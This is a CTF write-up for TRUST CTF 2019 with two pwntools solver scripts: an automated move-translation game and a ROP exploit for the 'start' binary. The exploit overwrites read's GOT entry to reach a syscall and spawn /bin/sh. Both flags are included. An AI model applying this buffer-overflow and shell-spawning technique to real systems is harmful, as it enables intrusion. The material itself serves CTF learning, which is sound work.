Write-up

TRUST CTF

dtqdtq01 2019. 2. 17. 04:41

Easy Taebo

from pwn import *

c = remote('server.trustctf.com', 44923)

for i in range(1, 101):
    c.recvuntil(("Taebo %s : " % i).encode())

    # Translate each move name into its ASCII-art form. left_mid_jab and
    # right_mid_jab are replaced before mid_jab so the shorter name never
    # matches inside them.
    moves = (c.recvline().decode()
             .replace("left_jab", "@==(^0^)@", 5)
             .replace("left_mid_jab", "@=(^0^)@", 5)
             .replace("right_mid_jab", "@(^0^)=@", 5)
             .replace("mid_jab", "@(^0^)@", 5)
             .replace("right_jab", "@(^0^)==@", 5)
             .replace("left_hook", "@(^0^)@==", 5)
             .replace("right_hook", "==@(^0^)@", 5)
             .replace("left_speedball", "@@@(^0^)", 5)
             .replace("right_speedball", "(^0^)@@@", 5)
             .replace("left_kick", "@||(^0^)==@", 5)
             .replace("mid_kick", "@==(^||^)==@", 5)
             .replace("right_kick", "@==(^0^)||@", 5)
             .replace(" >> \n", "", 1)
             .split(' + '))

    print("level%s" % i)
    print(moves)
    print(len(moves))

    # Send the translated moves back, each followed by a space
    tmp = ""
    for move in moves:
        tmp = tmp + move + ' '

    c.send((tmp + '\n').encode())

c.interactive()

TRUST{w0w_y0u_9o7_4_w0nd3rfu1_b0dy_lik3_m3}

start

from pwn import *
# r = remote('server.trustctf.com', 10392)
r = process('./start')
e = ELF('./start')
pr = 0x4005ed # pop rsi
ppppr = 0x4005ea # pop rax,rdx,rdi,rsi
cmd = b"/bin/sh\x00"
syscall = b"\x7b"

payload = b""
payload += b"A"*24 # padding before the saved return address
# rsi = .bss, then read() into it
payload += p64(pr)
payload += p64(e.bss())
payload += p64(e.plt['read'])

# rsi = GOT entry of read, then read() into it
payload += p64(pr)
payload += p64(e.got['read'])
payload += p64(e.plt['read'])

# rax = 59 (execve), rdx = 0, rdi = .bss, rsi = 0
payload += p64(ppppr)
payload += p64(59)
payload += p64(0)
payload += p64(e.bss())
payload += p64(0)
payload += p64(e.plt['read'])
payload += cmd

r.sendline(payload)
r.send(syscall)
r.interactive()

TRUST{7h3_e4sie5t_t4sk_in_TRUST_CTF}
